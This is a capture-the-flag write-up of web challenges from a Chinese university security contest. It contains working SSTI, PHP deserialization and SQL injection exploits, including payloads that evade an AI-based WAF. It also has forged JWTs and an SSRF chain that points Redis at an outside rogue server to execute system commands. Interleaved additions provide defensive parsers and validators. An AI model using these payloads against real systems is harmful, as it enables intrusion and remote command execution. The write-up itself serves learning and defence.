19th National College Student Information Security Contest (Innovation and Practical Ability Competition) and 3rd "Great Wall Cup" Cyber, Data and AI Security Competition (Defense Competition): Preliminary Round

[Web]EzJava

Weak-password login: admin/admin123

Spring framework Thymeleaf SSTI payload

[[${7*7}]]
49

[[${#ctx}]]
{ip=10.0.0.248, now=2025-12-28T09:58:19.162353, ua=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36, thymeleaf::EvaluationContext=org.thymeleaf.spring5.expression.ThymeleafEvaluationContextWrapper@765801c6}[StandardHTMLInliner]([[${#ctx}]])


[[${#ctx.getClass().forName("java.nio.file.Files").getMethod("readString", #ctx.getClass().forName("java.nio.file.Path")).invoke(null, #ctx.getClass().forName("java.nio.file.Paths").getMethod("get", #ctx.getClass().forName("java.lang.String"), #ctx.getClass().forName("[Ljava.lang.String;")).invoke(null, "/fl" + "ag_y0u_d0nt_kn0w", #strings.arraySplit("", ",")))}]]

[Web]dedecms

Registered an account first and noticed an existing user named Aa123456789; tried logging in as it and found the weak password Aa123456789/Aa123456789.

A quick search shows that dedecms v5.1 sp2 has quite a few known vulnerabilities, most of them file uploads where the extension is changed in an intercepting proxy. Pick any upload point, upload an image with PHP embedded in it, intercept the request and change the extension to php.

[Web]redjs

The React.js vulnerability disclosed a few days ago. Used React2Shell to do it in one shot.

[Web]hellogate

Visiting the target shows an image; downloading it reveals an image with PHP embedded in it.

<?php
error_reporting(0);
class A {
    public $handle;
    public function triggerMethod() {
        // string concatenation calls $this->handle->__toString() when handle is an object
        echo "" . $this->handle;
    }
}
class B {
    public $worker;
    public $cmd;
    public function __toString() {
        // reading an undefined property on $this->worker invokes its __get()
        return $this->worker->result;
    }
}
class C {
    public $cmd;
    public function __get($name) {
        echo file_get_contents($this->cmd);
    }
}
$raw = isset($_POST['data']) ? $_POST['data'] : ''; // unused by the challenge
header('Content-Type: image/jpeg');
readfile("muzujijiji.jpg");
highlight_file(__FILE__);
$obj = unserialize($_POST['data']);
$obj->triggerMethod();

This is a POP chain (A::triggerMethod -> B::__toString -> C::__get); write an exp:

<?php
class A {
    public $handle;
}
class B {
    public $worker;
}
class C {
    public $cmd;
}

$a = new A();
$b = new B();
$c = new C();

$c->cmd = '/flag';
$b->worker = $c;
$a->handle = $b;

echo urlencode(serialize($a));
?>

POST it as data to get the flag.
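The defender's side of the same chain, added here as an example and not part of the challenge or this writeup: a small parser for PHP's serialize() format that lists every class a payload would instantiate, so an input filter or a log review can flag unexpected gadget classes before unserialize() ever runs. POP_CHAIN is reconstructed by hand from the exp above; the parser covers N, b, i, d, s, a and O and treats the input as Latin-1 bytes, which is an assumption. In PHP itself the equivalent control is unserialize($data, ['allowed_classes' => [...]]).

```python
from urllib.parse import unquote


class PhpUnserializeError(ValueError):
    pass


class PhpSerializedParser:
    """Recursive-descent parser for PHP serialize() output: N, b, i, d, s, a, O.
    Objects become dicts carrying a "__class__" key; class names are recorded in
    order of appearance in self.classes."""

    def __init__(self, data: bytes):
        self.data = data
        self.pos = 0
        self.classes = []

    def parse(self):
        value = self._value()
        if self.pos != len(self.data):
            raise PhpUnserializeError(f"trailing bytes at offset {self.pos}")
        return value

    def _expect(self, token: bytes):
        if not self.data.startswith(token, self.pos):
            raise PhpUnserializeError(f"expected {token!r} at offset {self.pos}")
        self.pos += len(token)

    def _read_until(self, sep: bytes) -> bytes:
        end = self.data.find(sep, self.pos)
        if end < 0:
            raise PhpUnserializeError(f"missing {sep!r} after offset {self.pos}")
        out = self.data[self.pos:end]
        self.pos = end + 1
        return out

    def _read_string(self) -> str:
        # s:<byte length>:"<bytes>"  -- PHP trusts the declared length, so it is
        # checked against the input rather than searching for the closing quote.
        length = int(self._read_until(b":"))
        self._expect(b'"')
        raw = self.data[self.pos:self.pos + length]
        if len(raw) != length:
            raise PhpUnserializeError("declared string length runs past end of input")
        self.pos += length
        self._expect(b'"')
        return raw.decode("latin-1")  # assumption: byte-for-byte mapping is enough here

    def _members(self, count: int) -> dict:
        self._expect(b"{")
        out = {}
        for _ in range(count):
            key = self._value()
            if not isinstance(key, (int, str)):
                raise PhpUnserializeError("array/object keys must be int or string")
            out[key] = self._value()
        self._expect(b"}")
        return out

    def _value(self):
        tag = self.data[self.pos:self.pos + 1]
        if tag == b"N":
            self._expect(b"N;")
            return None
        if tag == b"b":
            self._expect(b"b:")
            return self._read_until(b";") == b"1"
        if tag == b"i":
            self._expect(b"i:")
            return int(self._read_until(b";"))
        if tag == b"d":
            self._expect(b"d:")
            return float(self._read_until(b";"))
        if tag == b"s":
            self._expect(b"s:")
            value = self._read_string()
            self._expect(b";")
            return value
        if tag == b"a":
            self._expect(b"a:")
            return self._members(int(self._read_until(b":")))
        if tag == b"O":
            self._expect(b"O:")
            name = self._read_string()
            self.classes.append(name)
            self._expect(b":")
            obj = self._members(int(self._read_until(b":")))
            obj["__class__"] = name
            return obj
        raise PhpUnserializeError(f"unknown type tag {tag!r} at offset {self.pos}")


def inspect_php_payload(form_value: str, allowed_classes=()):
    """Decode a (possibly URL-encoded) POST value and return
    (classes_in_order, classes_not_in_allowlist). Raises on malformed input."""
    parser = PhpSerializedParser(unquote(form_value).encode("latin-1"))
    parser.parse()
    return parser.classes, [c for c in parser.classes if c not in allowed_classes]


# Constructed sample: what the exp above serialises (A -> B -> C, cmd = /flag).
POP_CHAIN = 'O:1:"A":1:{s:6:"handle";O:1:"B":1:{s:6:"worker";O:1:"C":1:{s:3:"cmd";s:5:"/flag";}}}'

if __name__ == "__main__":
    print(inspect_php_payload(POP_CHAIN, allowed_classes=("A",)))
```

Run against the reconstructed chain with only A allowed, the parser reports B and C as out-of-policy classes: exactly the two gadgets the chain needs. A filter built this way rejects the payload for the classes it names, not for any byte pattern, so re-encoding or renaming properties does not get around it.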

[Web]AI_WAF

SQL injection behind an AI-based filter. A bit of probing shows that -1'||substr(database(),1,1)='a'# works for boolean-based blind injection; write an exp:

from time import sleep
import requests
import string

url = "http://60.205.252.190:34938/search"
headers = {"Content-Type": "application/json"}

# chars = string.digits + string.ascii_letters + "_"
chars = string.ascii_letters + "_"
result = ""
for i in range(1, 20):
    for char in chars:
        # Payload: -1'||substr(database(),1,1)='a'#
        payload = f"-1'||substr(database(),{i},1)='{char}'#"
        data = {"query": payload}

        try:
            sleep(1)
            r = requests.post(url, json=data, headers=headers, timeout=3)
            res = r.json()
            print(res)
            count = res.get("count", 0)

            # a non-zero result count means the guessed character is correct
            if count != 0:
                result += char
                print(result)
                break
        except Exception as e:
            print("request failed:", e)

print(result)
# nexadata

Next tried to keep blind-injecting with that database name, but it could no longer get past the AI WAF, so other approaches were considered. Swapping database() for version() in the blind injection showed the backend is MySQL 5.

/*!50000 */ is MySQL's version-conditional inline comment: its contents are executed as SQL only when the MySQL version is at least the stated number (50000 here means 5.0.0). The syntax is uncommon, which is what lets it get past the AI WAF.

Construct the following payload:

-1'/*!50000union*/ /*!50000select*/ 1,(/*!50000select*/ group_concat(table_name) /*!50000from*/ /*!50000information_schema.tables*/ /*!50000where*/ table_schema='nexadata'),3;#

This returns article,where_is_my_flagggggg.

-1'/*!50000union*/ /*!50000select*/ 1,(/*!50000select*/ * from nexadata.where_is_my_flagggggg),3;#

Got the flag.
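Added example, not from the writeup or from any WAF product, covering both the boolean blind probe at the start of this section and the version-comment payloads: the normalisation step a filter needs in front of its rules. Conditional-comment bodies are unfolded into what MySQL will actually run, ordinary comments are dropped, and only then are signatures applied. The rule set, its names and the classify/raw_rule_hits helpers are constructed for illustration; the two payloads are the ones from this section.

```python
import re

# MySQL executes the body of /*!NNNNN ... */ when its version is >= N.NN.NN, and the
# body of a bare /*! ... */ always; a filter that reads the raw text sees only a comment.
VERSION_COMMENT = re.compile(r"/\*!(?:\d{5})?\s*(.*?)\s*\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)

# Constructed, illustrative rule set applied after normalisation.
SQL_RULES = {
    "union-select": re.compile(r"\bunion\b.*?\bselect\b", re.I | re.S),
    "schema-probe": re.compile(r"\binformation_schema\b", re.I),
    "boolean-blind": re.compile(r"\bsubstr(?:ing)?\s*\(\s*(?:database|version|user)\s*\(", re.I),
}

# Payloads from this section, used as test input.
VERSION_COMMENT_PAYLOAD = (
    "-1'/*!50000union*/ /*!50000select*/ 1,(/*!50000select*/ group_concat(table_name) "
    "/*!50000from*/ /*!50000information_schema.tables*/ /*!50000where*/ "
    "table_schema='nexadata'),3;#"
)
BLIND_PAYLOAD = "-1'||substr(database(),1,1)='a'#"


def normalize_sql(fragment: str) -> str:
    """Rewrite a query fragment into the text MySQL would execute: keep the bodies
    of version-conditional comments, drop ordinary comments, collapse whitespace."""
    text = VERSION_COMMENT.sub(lambda m: " " + m.group(1) + " ", fragment)
    text = PLAIN_COMMENT.sub(" ", text)
    return re.sub(r"\s+", " ", text).strip()


def classify(fragment: str):
    """Return (normalised_text, names_of_rules_that_match_it)."""
    normalised = normalize_sql(fragment)
    return normalised, [name for name, rx in SQL_RULES.items() if rx.search(normalised)]


def raw_rule_hits(fragment: str):
    """The same rules on the un-normalised text, to show what a naive filter misses."""
    return [name for name, rx in SQL_RULES.items() if rx.search(fragment)]


if __name__ == "__main__":
    for payload in (VERSION_COMMENT_PAYLOAD, BLIND_PAYLOAD):
        print("raw:", raw_rule_hits(payload))
        print("normalised:", classify(payload))
```

On the raw text none of the three rules fires on the /*!50000 ... */ payload, because every keyword is glued to the digits of the version number; after normalisation both union-select and schema-probe match. A filter, hand-written or learned, that scores the raw string is judging a different query than the one the database executes. This is a detection aid only: the search endpoint itself needs a parameterised query.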

[Web]Deprecated

Following AsaL1n's writeup, this turns out to be a reused challenge.

git clone https://github.com/sammwyy/r2sae
cd r2sae

docker run -it sig2n /bin/bash

root@7f5f15b8bf09:/app# python3 jwt_forgery.py eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IjEiLCJwcml2aWxlZGdlIjoiVGVtcCBVc2VyIiwiaWF0IjoxNzY2OTAxMjI0fQ.200-7l5FAFAPmXWjvcpPbmxUPHdowPrwdswwuWQAo68D882fCdlAiG54vWx2l3I-iM2mXOVDFxlVnw5A4gzxqxwhtu5RIITQwApDBxGu_3MHdQ10_nvvO8tDv7fFSrC2_kM4VOVEtjabQBgn1OGQfNjAQEeM8m1nxX5qXsyBUEI eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IjEiLCJwcml2aWxlZGdlIjoiVGVtcCBVc2VyIiwiaWF0IjoxNzY2OTAxMjY0fQ.nnk29Tek8TIcRFEjHmDnC60_cSToSAXPbbD-v3jZJu_bbwG7tBPCHohbz3fvZt4yUmH5vXLDyawJDyaKzfiQFI7LNhr12TInDmiDJRIBNAjKBSDAiXZS37I_lss8ftrJq8olOhkzlCRia5EQUqpp_s08jQe75FKifXM_zuugLE4 eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IjEiLCJwcml2aWxlZGdlIjoiVGVtcCBVc2VyIiwiaWF0IjoxNzY2OTAxMjgwfQ.aPy4NdsNwghpXlB0PoLohDaM4kgDilHmsnkPl691_dNvwuPyXmpJ4Qzd68wH0zq9oavXckgCim4AiM8p-jtNJA8jwBidR85DePOye73XISAHFb8xC24e0dfvK4pytbmAyfjys8fAPYigU4ATH6ZEY5zOEXSpkWZdM3XFFoR-7XY
[*] GCD: 0x1
[*] GCD: 0xe5f772ebb5363556eaa13c773bcb939090798e1107e90c6b3703c4779a72c3717377248f2d32876270eb767acfa88cfebaa70501bdd58b8b2f5229d1cf0068cd19902d4a9501b9935887fe4e91d8c82b2488f69163ece5fed2ebad57df358feaa93bb39e0ead8e4c77a8d5b7e52474d11e5d0ce58cb8e796e583a2928266e35b
[+] Found n with multiplier 1 :
0xe5f772ebb5363556eaa13c773bcb939090798e1107e90c6b3703c4779a72c3717377248f2d32876270eb767acfa88cfebaa70501bdd58b8b2f5229d1cf0068cd19902d4a9501b9935887fe4e91d8c82b2488f69163ece5fed2ebad57df358feaa93bb39e0ead8e4c77a8d5b7e52474d11e5d0ce58cb8e796e583a2928266e35b
[+] Written to e5f772ebb5363556_65537_x509.pem
[+] Tampered JWT: b'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ICIxIiwgInByaXZpbGVkZ2UiOiAiVGVtcCBVc2VyIiwgImlhdCI6IDE3NjY5MDEyMjQsICJleHAiOiAxNzY2OTg5MzUzfQ.wGAJmzR5DOM6NPMSF4tuKyMxqrUMiQEZ3UXeQBi4MKk'
[+] Written to e5f772ebb5363556_65537_pkcs1.pem
[+] Tampered JWT: b'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ICIxIiwgInByaXZpbGVkZ2UiOiAiVGVtcCBVc2VyIiwgImlhdCI6IDE3NjY5MDEyMjQsICJleHAiOiAxNzY2OTg5MzUzfQ.dpXSrmSVXe_4JyAGUm0QvHrWDe3JfKh7uxg6A1p8C18'
================================================================================
Here are your JWT's once again for your copypasting pleasure
================================================================================
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ICIxIiwgInByaXZpbGVkZ2UiOiAiVGVtcCBVc2VyIiwgImlhdCI6IDE3NjY5MDEyMjQsICJleHAiOiAxNzY2OTg5MzUzfQ.wGAJmzR5DOM6NPMSF4tuKyMxqrUMiQEZ3UXeQBi4MKk
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ICIxIiwgInByaXZpbGVkZ2UiOiAiVGVtcCBVc2VyIiwgImlhdCI6IDE3NjY5MDEyMjQsICJleHAiOiAxNzY2OTg5MzUzfQ.dpXSrmSVXe_4JyAGUm0QvHrWDe3JfKh7uxg6A1p8C18

After recovering the public key, reproduce the rest following that writeup.
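What the server side of this challenge should have done, as an added example that is not the challenge's code or the writeup's: the verifier pins the algorithm from its own configuration and compares the token header against it, instead of dispatching on whatever the header says. Both branches are real: HS256 through hmac, and a pure-Python RSASSA-PKCS1-v1_5/SHA-256 check driven by the modulus printed in the transcript above with e = 65537 (the exponent in the PEM file name). TAMPERED_TOKEN is the first HS256 token the forgery step printed; the HS256 secret used for the demo is constructed.

```python
import base64
import hashlib
import hmac
import json

# Modulus recovered in the transcript above (hex) and e = 65537 from the PEM file name.
RECOVERED_N = int(
    "e5f772ebb5363556eaa13c773bcb939090798e1107e90c6b3703c4779a72c371"
    "7377248f2d32876270eb767acfa88cfebaa70501bdd58b8b2f5229d1cf0068cd"
    "19902d4a9501b9935887fe4e91d8c82b2488f69163ece5fed2ebad57df358fea"
    "a93bb39e0ead8e4c77a8d5b7e52474d11e5d0ce58cb8e796e583a2928266e35b", 16)
RSA_E = 65537
# DigestInfo prefix for SHA-256 (RFC 8017, section 9.2, note 1).
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")

# The HS256 token produced by the forgery step above.
TAMPERED_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJ1c2VybmFtZSI6ICIxIiwgInByaXZpbGVkZ2UiOiAiVGVtcCBVc2VyIiwgImlhdCI6IDE3NjY5MDEyMjQsICJleHAiOiAxNzY2OTg5MzUzfQ."
    "wGAJmzR5DOM6NPMSF4tuKyMxqrUMiQEZ3UXeQBi4MKk"
)


class JwtError(Exception):
    pass


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def hs256_mac(signing_input: bytes, secret: bytes) -> bytes:
    return hmac.new(secret, signing_input, hashlib.sha256).digest()


def rs256_verify(signing_input: bytes, sig: bytes, n: int, e: int) -> bool:
    """RSASSA-PKCS1-v1_5 with SHA-256: recover EM = sig^e mod n and compare it
    with the expected 00 01 FF..FF 00 || DigestInfo || hash encoding."""
    k = (n.bit_length() + 7) // 8
    if len(sig) != k:
        return False
    em = pow(int.from_bytes(sig, "big"), e, n).to_bytes(k, "big")
    t = SHA256_DIGESTINFO + hashlib.sha256(signing_input).digest()
    expected = b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t
    return hmac.compare_digest(em, expected)


def verify_jwt(token: str, expected_alg: str, key) -> dict:
    """Verify a compact JWS with the algorithm fixed by server configuration.

    `key` is the HMAC secret (bytes) for HS256 or an (n, e) tuple for RS256.
    The header's alg is compared to the pinned value and never used to pick the
    verifier: a token claiming HS256 against an RS256 deployment is refused
    before any MAC is computed, so the public key can never act as a secret."""
    parts = token.split(".")
    if len(parts) != 3:
        raise JwtError("malformed token")
    h, p, s = parts
    try:
        header = json.loads(b64url_decode(h))
        sig = b64url_decode(s)
    except ValueError as exc:  # binascii.Error and JSON errors are ValueErrors
        raise JwtError(f"undecodable token: {exc}")
    if not isinstance(header, dict) or header.get("alg") != expected_alg:
        raise JwtError(f"alg mismatch: header says {header.get('alg') if isinstance(header, dict) else None!r}, "
                       f"server pins {expected_alg!r}")
    signing_input = f"{h}.{p}".encode()
    if expected_alg == "HS256":
        ok = hmac.compare_digest(hs256_mac(signing_input, key), sig)
    elif expected_alg == "RS256":
        ok = rs256_verify(signing_input, sig, key[0], key[1])
    else:
        raise JwtError(f"no verifier configured for {expected_alg!r}")
    if not ok:
        raise JwtError("signature verification failed")
    return json.loads(b64url_decode(p))


def make_hs256_token(claims: dict, secret: bytes) -> str:
    """Issue an HS256 token; used here only to exercise the HS256 branch."""
    h = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    p = b64url_encode(json.dumps(claims).encode())
    return f"{h}.{p}." + b64url_encode(hs256_mac(f"{h}.{p}".encode(), secret))


def rejection_reason(token: str, expected_alg: str, key):
    """None if the token verifies, otherwise the reason it was refused."""
    try:
        verify_jwt(token, expected_alg, key)
        return None
    except JwtError as exc:
        return str(exc)


if __name__ == "__main__":
    print(rejection_reason(TAMPERED_TOKEN, "RS256", (RECOVERED_N, RSA_E)))
```

With RS256 pinned, the forged token is refused at the alg comparison, so it does not matter that its signature is a correct HMAC over the PEM. A library call that takes the algorithm from the header, or that accepts an algorithms list containing both RS256 and HS256 with a single key argument, reintroduces the confusion this challenge is built on.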

[Unsolved][Web]0o0o0o0o0

http://123.56.93.38:28707/data?id=1'union select 1,2,3 and '1'='1

Columns 1 and 2 are controllable.
No further progress was made.

[Post-contest reproduction][Web]hjppx

SSRF. Quick probing finds redis, mysql and a pb-cms on port 8080 on the internal network.

Fetching redis with dict://127.0.0.1:6379/info shows it has no password. Using redis-rogue-server and following its README, send the following requests in order:

# set the dump file name
action=fetch&url=dict://127.0.0.1:6379/config:set:dbfilename:exp.so

# connect to the malicious Redis server
action=fetch&url=dict://127.0.0.1:6379/slaveof:120.26.146.96:21000

# load the malicious module
action=fetch&url=dict://127.0.0.1:6379/module:load:./exp.so

# stop master-slave replication
action=fetch&url=dict://127.0.0.1:6379/slaveof:no:one

# execute a system command
action=fetch&url=dict://127.0.0.1:6379/system.exec:"ls /"
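The defender's view of the same step, as an added example (not the challenge's code and not redis-rogue-server's): the fetch handler that the dict:// requests above pass through should validate the URL before it opens a connection. The validator takes a resolver callback so it runs offline against a constructed DNS table; ALLOWED_SCHEMES, ALLOWED_PORTS, the host names and the fake_resolve helper are assumptions.

```python
import ipaddress
from typing import Callable, List, Optional
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def is_internal(ip) -> bool:
    """True for loopback, RFC 1918, link-local (including 169.254.169.254),
    multicast, reserved and unspecified addresses, IPv4 or IPv6."""
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def check_fetch_url(url: str, resolve: Callable[[str], List[str]]) -> Optional[str]:
    """Return None if `url` may be fetched, otherwise the reason it is refused.

    `resolve(host)` returns the IP strings the host currently maps to. The caller
    must connect to exactly those addresses rather than resolving again, or a
    DNS answer that changes between check and fetch sidesteps this check."""
    try:
        parts = urlsplit(url)
        port = parts.port  # raises ValueError for a non-numeric port
    except ValueError:
        return "unparseable url"
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return f"scheme {parts.scheme!r} not allowed"
    if parts.username or parts.password:
        return "credentials in url"
    host = parts.hostname
    if not host:
        return "missing host"
    if port is None:
        port = 443 if scheme == "https" else 80
    if port not in ALLOWED_PORTS:
        return f"port {port} not allowed"
    try:
        addrs = [ipaddress.ip_address(host)]
    except ValueError:
        # Not a plain literal: ask the resolver. Decimal or hex spellings of an
        # address are typically resolved by getaddrinfo as well, so the resolved
        # addresses are checked the same way below.
        addrs = [ipaddress.ip_address(a) for a in resolve(host)]
    if not addrs:
        return "host does not resolve"
    for ip in addrs:
        if is_internal(ip):
            return f"resolves to internal address {ip}"
    return None


# Constructed resolver table so the example runs offline.
FAKE_DNS = {
    "example.com": ["93.184.216.34"],
    "internal.corp": ["10.0.0.5"],
    "rebind.test": ["93.184.216.34", "127.0.0.1"],
}


def fake_resolve(host: str) -> List[str]:
    return FAKE_DNS.get(host, [])


# The URLs from this section, as the fetch handler would receive them.
WRITEUP_URLS = [
    "dict://127.0.0.1:6379/info",
    "dict://127.0.0.1:6379/config:set:dbfilename:exp.so",
    "dict://127.0.0.1:6379/slaveof:120.26.146.96:21000",
]

if __name__ == "__main__":
    for u in WRITEUP_URLS + ["http://example.com/", "http://internal.corp/", "http://127.0.0.1:6379/"]:
        print(u, "->", check_fetch_url(u, fake_resolve))
```

Every dict:// request from this section fails at the scheme check, a loopback literal fails at the address check even over http, and a name that looks external but resolves into a private range is refused as well. The resolver injection is also what closes the rebinding gap: the fetch must connect to the addresses that were checked, not resolve the name a second time.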
